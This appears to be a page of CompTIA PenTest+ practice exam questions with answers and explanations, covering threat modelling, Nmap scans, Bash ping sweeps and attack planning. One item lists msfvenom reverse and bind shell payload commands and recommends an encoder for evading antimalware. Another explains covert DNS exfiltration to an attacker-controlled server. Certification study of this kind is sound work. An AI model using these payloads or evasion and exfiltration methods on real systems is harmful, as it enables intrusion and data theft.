Ask Question
CompTIA PT0-003 Practice Test - Questions Answers, Page 13
Add to Whishlist
List of questions
Question 121
Which of the following explains the reason a tester would opt to use DREAD over PTES during the planning phase of a penetration test?
The tester is conducting a web application test.
The tester is assessing a mobile application.
The tester is evaluating a thick client application.
The tester is creating a threat model.
DREAD for Threat Modeling:
DREAD is a risk assessment framework used in threat modeling to prioritize vulnerabilities based on their impact, reproducibility, exploitability, affected users, and discoverability.
It is specifically designed for creating and analyzing threat models.
Why Not Other Options?
A, B, C: While DREAD can be applied in various contexts (web, mobile, thick client applications), its primary purpose is threat modeling, not specific testing methodologies like PTES.
CompTIA Pentest+
Reference:
Domain 1.0 (Planning and Scoping)
Question 122
A penetration tester is ready to add shellcode for a specific remote executable exploit. The tester is trying to prevent the payload from being blocked by antimalware that is running on the target. Which of the following commands should the tester use to obtain shell access?
msfvenom --arch x86-64 --platform windows --encoder x86-64/shikata_ga_nai --payload windows/bind_tcp LPORT=443
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.100 LPORT=8000
msfvenom --arch x86-64 --platform windows --payload windows/shell_reverse_tcp LHOST=10.10.10.100 LPORT=4444 EXITFUNC=none
net user add /administrator | hexdump > payload
Using shikata_ga_nai:
This encoder obfuscates the payload, making it harder for antimalware to detect.
The command specifies a bind shell (windows/bind_tcp) payload, targeting Windows with architecture x86-64.
Why Not Other Options?
B, C: These commands generate payloads but do not use an encoder, increasing the likelihood of detection by antimalware.
D: This command is unrelated to generating shellcode; it appears to be an attempt to manipulate accounts.
CompTIA Pentest+
Reference:
Domain 3.0 (Attacks and Exploits)
Question 123
A penetration tester performs a service enumeration process and receives the following result after scanning a server using the Nmap tool:
bash
PORT STATE SERVICE
22/tcp open ssh
25/tcp filtered smtp
111/tcp open rpcbind
2049/tcp open nfs
Based on the output, which of the following services provides the best target for launching an attack?
Database
Remote access
File sharing
From the Nmap results:
Service Analysis:
SSH (22): Secure Shell is a remote access protocol that is typically well-secured with encryption and authentication mechanisms. It's not the easiest to exploit without valid credentials or known vulnerabilities.
SMTP (25): The port is filtered, which indicates that it might be blocked by a firewall, making it less accessible as an attack vector.
RPCBind (111): RPC services can sometimes expose vulnerabilities, but they are less common in modern systems.
NFS (2049): Network File System is a file-sharing service. Misconfigured NFS servers often expose sensitive files or directories that can be accessed without proper authentication.
Best Target:
NFS (port 2049) is the most attractive target. Attackers can exploit insecure exports, gain unauthorized access to shared directories, or elevate privileges if the server allows root access over NFS.
CompTIA Pentest+
Reference:
Domain 2.0 (Information Gathering and Vulnerability Identification)
Domain 3.0 (Attacks and Exploits)
Question 124
A penetration tester writes a Bash script to automate the execution of a ping command on a Class C network:
bash
for var in ---MISSING TEXT---
do
ping -c 1 192.168.10.$var
done
Which of the following pieces of code should the penetration tester use in place of the ---MISSING TEXT--- placeholder?
crunch 1 254 loop
seq 1 254
echo 1-254
{1.-254}
Correct Syntax for a Range Loop in Bash:
The seq command generates a sequence of numbers in a specified range, which is ideal for iterating over IP addresses in a Class C subnet (1--254).
Example: seq 1 254 will output numbers 1, 2, ..., 254 sequentially.
Explanation of Other Options:
A (crunch): The crunch command is used for wordlist generation and is unrelated to looping in Bash.
C (echo 1-254): This would output '1-254' as a string instead of generating a numeric range.
D ({1.-254}): This is incorrect Bash syntax and would result in a script error.
Final Script:
bash
for var in $(seq 1 254)
do
ping -c 1 192.168.10.$var
done
CompTIA Pentest+
Reference:
Domain 4.0 (Penetration Testing Tools)
Bash Scripting and Automation
Question 125
A penetration tester is attempting to exfiltrate sensitive data from a client environment without alerting the client's blue team. Which of the following exfiltration methods most likely remain undetected?
Cloud storage
Domain Name System
Test storage sites
The Domain Name System (DNS) is commonly used for covert exfiltration because it is an essential protocol in most networks and is less likely to be scrutinized compared to other methods. Here's how DNS exfiltration works:
Mechanism:
Data is encoded into DNS queries or responses, such as using subdomain fields to transmit sensitive information.
These queries are sent to a malicious DNS server controlled by the attacker, allowing data to bypass traditional detection mechanisms.
Why It Remains Undetected:
DNS traffic is frequently allowed and not as heavily monitored compared to other channels like HTTP or email.
Network security tools often prioritize operational DNS traffic, making detection of anomalies more challenging.
CompTIA Pentest+
Reference:
Domain 3.0 (Attacks and Exploits)
Domain 5.0 (Reporting and Communication)
Question 126
During a pre-engagement activity with a new customer, a penetration tester looks for assets to test. Which of the following is an example of a target that can be used for testing?
API
HTTP
IPA
ICMP
API as a Target:
APIs (Application Programming Interfaces) are common assets to test for vulnerabilities such as improper authentication, data leakage, or injection attacks.
Testing APIs often uncovers critical issues in modern applications.
Why Not Other Options?
B (HTTP): This is a protocol, not a specific asset.
C (IPA): Unrelated to penetration testing (likely a typo or irrelevant here).
D (ICMP): This is a protocol used for network diagnostics, not an application asset.
CompTIA Pentest+
Reference:
Domain 1.0 (Planning and Scoping)
Question 127
A consultant starts a network penetration test. The consultant uses a laptop that is hardwired to the network to try to assess the network with the appropriate tools. Which of the following should the consultant engage first?
Service discovery
OS fingerprinting
Host discovery
DNS enumeration
In network penetration testing, the initial steps involve gathering information to build an understanding of the network's structure, devices, and potential entry points. The process generally follows a structured approach, starting from broad discovery methods to more specific identification techniques. Here's a comprehensive breakdown of the steps:
Host Discovery (Answer: C):
Objective: Identify live hosts on the network.
Tools & Techniques:
Ping Sweep: Using tools like nmap with the -sn option (ping scan) to check for live hosts by sending ICMP Echo requests.
ARP Scan: Useful in local networks, arp-scan can help identify all devices on the local subnet by broadcasting ARP requests.
nmap -sn 192.168.1.0/24
*
Reference:
The GoBox HTB write-up emphasizes the importance of identifying hosts before moving to service enumeration.
The Forge HTB write-up also highlights using Nmap for initial host discovery in its enumeration phase.
* Service Discovery (Option A):
Objective: After identifying live hosts, determine the services running on them.
Tools & Techniques:
Nmap: Often used with options like -sV for version detection to identify services.
nmap -sV 192.168.1.100
* Reference:
As seen in multiple write-ups (e.g., Anubis HTB and Bolt HTB), service discovery follows host identification to understand the services available for potential exploitation.
* OS Fingerprinting (Option B):
Objective: Determine the operating system of the identified hosts.
Tools & Techniques:
Nmap: With the -O option for OS detection.
nmap -O 192.168.1.100
* Reference:
Accurate OS fingerprinting helps tailor subsequent attacks and is often performed after host and service discovery, as highlighted in the write-ups.
* DNS Enumeration (Option D):
Objective: Identify DNS records and gather subdomains related to the target domain.
Tools & Techniques:
dnsenum, dnsrecon, and dig.
dnsenum example.com
DNS enumeration is crucial for identifying additional attack surfaces, such as subdomains and related services. This step is typically part of the reconnaissance phase but follows host discovery and sometimes service identification.
Conclusion: The initial engagement in a network penetration test is to identify the live hosts on the network (Host Discovery). This foundational step allows the penetration tester to map out active devices before delving into more specific enumeration tasks like service discovery, OS fingerprinting, and DNS enumeration. This structured approach ensures that the tester maximizes their understanding of the network environment efficiently and systematically.
Question 128
Which of the following protocols would a penetration tester most likely utilize to exfiltrate data covertly and evade detection?
Unlock Premium Member
Question 129
Which of the following is most important when communicating the need for vulnerability remediation to a client at the conclusion of a penetration test?
Question 130
A penetration tester needs to scan a remote infrastructure with Nmap. The tester issues the following command: nmap 10.10.1.0/24
Which of the following is the number of TCP ports that will be scanned?
Related questions
Export
If you didn't receive an email within 5 minutes, you should submit a support request to [email protected].
|
BASIC - 1 Month
$
10
Full latest questions
No CAPTCHA
New Updates
Export to VPLUS
Export to PDF - All questions
Team support
|
PLUS - 2 Months
$
15
Full latest questions
No CAPTCHA
New Updates
Export to VPLUS
Export to PDF - All questions
Team support
|
PRO - 6 Months
$
40
Full latest questions
No CAPTCHA
New Updates
Export to VPLUS
Export to PDF - All questions
Team support
|
Full latest questions
No CAPTCHA
New Updates
Export to VPLUS
Export to PDF - All questions
Team support
Full latest questions
No CAPTCHA
New Updates
Export to VPLUS
Export to PDF - All questions
Team support
Full latest questions
No CAPTCHA
New Updates
Export to VPLUS
Export to PDF - All questions
Team support
Selling illegal goods, money scams etc.
Serious attack on a group.
Harassing an individual (including doxing)
Threatening or glorifying violence or serious harm, including self-harm
Nudity/Sexual content
Sexually explicit or suggestive imagery or writing involving minors
Sexually explicit or suggestive imagery or writing involving non-consenting adults or non-humans
Reusing content without attribution (link and blockquotes)
Not in English or has very bad formatting, grammar, and spelling
Author's credential is offensive, spam, or impersonation
Ex. Illegal content, incomplete question...
Question